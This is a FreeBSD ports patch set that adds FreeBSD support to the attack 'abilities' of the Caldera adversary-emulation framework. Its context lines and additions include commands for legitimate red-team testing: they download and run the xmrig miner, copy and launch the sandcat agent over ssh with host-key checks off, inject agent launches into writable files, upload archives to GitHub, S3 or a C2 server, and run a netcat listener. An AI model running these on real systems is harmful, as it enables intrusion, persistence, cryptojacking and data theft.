plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml +@@ -12,7 +12,7 @@ + sh: + command: | + sudo ifconfig +- linux: ++ freebsd,linux: + sh: + command: | + sudo ifconfig diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml new file mode 100644 index 000000000000..deff7f08eed2 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml @@ -0,0 +1,20 @@ +--- plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml +@@ -12,6 +12,10 @@ + sh: + command: | + pwpolicy getaccountpolicies ++ freebsd: ++ sh: ++ command: | ++ cat /etc/pam.d/passwd + linux: + sh: + command: | +@@ -19,4 +23,4 @@ + windows: + psh: + command: | +- net accounts +\ No newline at end of file ++ net accounts diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml new file mode 100644 index 000000000000..15613cb57462 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml +@@ -15,7 +15,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.current.time +- linux: ++ freebsd,linux: + sh: + command: | + date -u +"%Y-%m-%dT%H:%M:%SZ" diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml new file mode 100644 index 000000000000..336bdd598724 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml +@@ -14,7 +14,7 @@ + pkill -f sandcat + payloads: + - sandcat.go +- linux: ++ freebsd,linux: + sh: + command: | + nohup ./sandcat.go -server #{server} & diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml new file mode 100644 index 000000000000..005748e3ee73 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml +@@ -10,7 +10,7 @@ + attack_id: T1567.001 + name: Exfiltration to Code Repository + platforms: +- linux: ++ freebsd,linux: + sh: + command: | # Temporary file needed to avoid curl length restrictions + GHUser="#{github.user.name}"; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml new file mode 100644 index 000000000000..0b273cc3e81e --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml +@@ -6,7 +6,7 @@ + attack_id: T1029 + name: Scheduled Transfer + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + crontab -l > /tmp/origcron; +@@ -46,4 +46,4 @@ + + Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action; + cleanup: | +- Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; +\ No newline at end of file ++ Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml new file mode 100644 index 000000000000..7314e2e0e6ab --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml +@@ -6,7 +6,7 @@ + attack_id: T1560.001 + name: 'Archive Collected Data: Archive via Utility' + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml new file mode 100644 index 000000000000..69160b87e16a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml +@@ -17,7 +17,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.dir.compress +- linux: ++ freebsd,linux: + sh: + command: | + tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz +@@ -38,4 +38,4 @@ + - source: host.dir.compress + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.staged +\ No newline at end of file ++ - source: host.dir.staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml new file mode 100644 index 000000000000..c9f92c4ed759 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml +@@ -43,7 +43,7 @@ + $result = $sr.ReadToEnd(); + $result; + $res.close(); +- linux: ++ freebsd,linux: + sh: + command: | + LocalFile='#{host.dir.compress}'; +@@ -55,4 +55,4 @@ + --data-binary @#{host.dir.compress} + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.compress +\ No newline at end of file ++ - source: host.dir.compress diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml new file mode 100644 index 000000000000..28fa5c84164e --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml +@@ -6,7 +6,7 @@ + attack_id: T1567.001 + name: Exfiltration to Code Repository + platforms: +- linux: # https://docs.github.com/en/rest/reference/repos#contents ++ freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents + sh: + command: | + GHUser="#{github.user.name}"; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml new file mode 100644 index 000000000000..26fd685ed8fc --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml +@@ -11,7 +11,7 @@ + attack_id: T1030 + name: Data Transfer Size Limits + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml new file mode 100644 index 000000000000..d31c5b4033ef --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml +@@ -7,7 +7,7 @@ + attack_id: T1567.001 + name: Exfiltration to Code Repository + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + GHUser="#{github.user.name}"; +@@ -62,4 +62,4 @@ + }; + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.staged +\ No newline at end of file ++ - source: host.dir.staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml new file mode 100644 index 000000000000..5fc9da37edc5 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml +@@ -9,7 +9,7 @@ + attack_id: T1537 + name: 'Transfer Data to Cloud Account' + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + LocalFile='#{host.dir.compress}'; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml new file mode 100644 index 000000000000..53bbfc44e9e4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml +@@ -8,7 +8,7 @@ + attack_id: T1048.003 + name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + LocalFile='#{host.dir.compress}'; +@@ -35,4 +35,4 @@ + $requestStream.Dispose(); + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.compress +\ No newline at end of file ++ - source: host.dir.compress diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml new file mode 100644 index 000000000000..36cfe29cab10 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml +@@ -8,7 +8,7 @@ + attack_id: T1567.002 + name: 'Exfiltration to Cloud Storage' + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + LocalFile='#{host.dir.compress}'; +@@ -30,4 +30,4 @@ + aws s3 rm s3://#{s3.source.name}/$RemoteName; + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.compress +\ No newline at end of file ++ - source: host.dir.compress diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml new file mode 100644 index 000000000000..0035807bbc2d --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml +@@ -12,7 +12,7 @@ + sh: + command: | + curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload +- linux: ++ freebsd,linux: + sh: + command: | + curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml new file mode 100644 index 000000000000..e01052cff30e --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml @@ -0,0 +1,22 @@ +--- plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml +@@ -19,6 +19,19 @@ + cleanup: | + rm -rf ./xmrig*; + timeout: 120 ++ freebsd: ++ sh: ++ # FreeBSD should include `timeout` making this easy. ++ # We expect timeout to return a 124, which needs to then return a 0 ++ # to make Caldera UI happy. ++ command: | ++ wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz; ++ tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz; ++ timeout 60 ./xmrig-6.19.2/xmrig; ++ [ $? -eq 124 ] ++ cleanup: | ++ rm -rf ./xmrig*; ++ timeout: 120 + darwin: + sh: + # MacOS does not include timeout, but can mimic the process with screen. diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml new file mode 100644 index 000000000000..b5ef72e367f9 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml +@@ -12,7 +12,7 @@ + sh: + command: | + echo "proof that this machine was hacked." > message.txt +- linux: ++ freebsd,linux: + sh: + command: | + echo "proof that this machine was hacked." > message.txt diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml new file mode 100644 index 000000000000..89f970a49053 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml +@@ -7,7 +7,7 @@ + command: ./mission.go -duration 60 -extension .caldera -dir '/' + payloads: + - mission.go +- linux: ++ freebsd,linux: + sh: + command: ./mission.go -duration 60 -extension .caldera -dir '/' + payloads: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml new file mode 100644 index 000000000000..1016cc6fb5c5 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml @@ -0,0 +1,16 @@ +--- plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml +@@ -24,4 +24,13 @@ + ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' + payloads: + - sandcat.go-linux ++ freebsd: ++ sh: ++ command: | ++ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go && ++ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &' ++ cleanup: | ++ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' ++ payloads: ++ - sandcat.go-freebsd + singleton: True diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml new file mode 100644 index 000000000000..a396438d78ed --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml @@ -0,0 +1,15 @@ +--- plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml +@@ -54,4 +54,12 @@ + ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go' + payloads: + - sandcat.go-linux ++ freebsd: ++ sh: ++ command: | ++ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go ++ cleanup: | ++ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go' ++ payloads: ++ - sandcat.go-freebsd + singleton: True diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml new file mode 100644 index 000000000000..85d98fa7d6c4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml @@ -0,0 +1,12 @@ +--- plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml +@@ -18,3 +18,9 @@ + find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-linux && sandcat.go-linux" >> "{}"; ls "{}" ' \; | echo "complete" + payloads: + - sandcat.go ++ freebsd: ++ sh: ++ command: | ++ find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-freebsd && sandcat.go-freebsd" >> "{}"; ls "{}" ' \; | echo "complete" ++ payloads: ++ - sandcat.go diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml new file mode 100644 index 000000000000..6ff46df63b9c --- /dev/null +++ b/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml @@ -0,0 +1,11 @@ +--- plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml.orig 2022-08-08 23:35:27 UTC ++++ plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + touch ~/.bashrc; diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml new file mode 100644 index 000000000000..48a3bc429da0 --- /dev/null +++ b/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml @@ -0,0 +1,17 @@ +--- plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml.orig 2022-08-08 23:35:27 UTC ++++ plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml +@@ -7,11 +7,11 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + nc -nlv 7011 & + darwin: + sh: + command: | +- nc -nlv 7011 & +\ No newline at end of file ++ nc -nlv 7011 & diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml new file mode 100644 index 000000000000..9213235c7428 --- /dev/null +++ b/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml @@ -0,0 +1,13 @@ +--- plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml.orig 2022-08-08 23:35:27 UTC ++++ plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | +- rm -f /var/mail/victim +\ No newline at end of file ++ rm -f /var/mail/victim diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml new file mode 100644 index 000000000000..3861a5c894b6 --- /dev/null +++ b/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml @@ -0,0 +1,15 @@ +--- plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml.orig 2022-08-08 23:35:27 UTC ++++ plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml +@@ -7,9 +7,9 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mv ./phish_email.txt /var/mail/victim + payloads: +- - phish_email.txt +\ No newline at end of file ++ - phish_email.txt diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml new file mode 100644 index 000000000000..114e8f3ba003 --- /dev/null +++ b/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml @@ -0,0 +1,18 @@ +--- plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml.orig 2022-08-08 23:35:27 UTC ++++ plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + crontab -l > new_crontab; +@@ -26,4 +26,4 @@ + command: | + $action = New-ScheduledTaskAction -Execute "calc.exe"; + $trigger = New-ScheduledTaskTrigger -Daily -At 9am; +- Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "FindMe" -Description "Pretend malicious scheduled action"; +\ No newline at end of file ++ Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "FindMe" -Description "Pretend malicious scheduled action"; diff --git a/security/caldera/files/patch-templates_abilities.html b/security/caldera/files/patch-templates_abilities.html new file mode 100644 index 000000000000..1a74bbb85a5a --- /dev/null +++ b/security/caldera/files/patch-templates_abilities.html @@ -0,0 +1,11 @@ +--- templates/abilities.html.orig 2022-09-17 15:28:09 UTC ++++ templates/abilities.html +@@ -103,7 +103,7 @@ + <p class="platforms"> + <template x-for="platform of getAbilityPlatforms(ability)"> + <span class="has-tooltip-arrow has-tooltip-left no-underline" x-bind:data-tooltip="platform"> +- <span class="icon is-small"><i class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></i></span> ++ <span class="icon is-small"><i class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></i></span> + </span> + </template> + </p> diff --git a/security/caldera/files/patch-templates_adversaries.html b/security/caldera/files/patch-templates_adversaries.html new file mode 100644 index 000000000000..4ca0e76f1816 --- /dev/null +++ b/security/caldera/files/patch-templates_adversaries.html @@ -0,0 +1,20 @@ +--- templates/adversaries.html.orig 2022-09-17 15:28:09 UTC ++++ templates/adversaries.html +@@ -143,7 +143,7 @@ + <td x-show="undefinedAbilities.indexOf(ability.ability_id)"> + <template x-for="platform of getExecutorDetail('platforms', ability)"> + <span class="has-tooltip-arrow no-underline" x-bind:data-tooltip="platform"> +- <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></em></span> ++ <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 